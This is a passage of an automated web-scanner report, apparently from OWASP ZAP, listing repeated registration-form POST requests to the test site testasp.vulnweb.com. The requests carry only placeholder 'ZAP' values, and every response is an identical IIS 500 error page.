HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
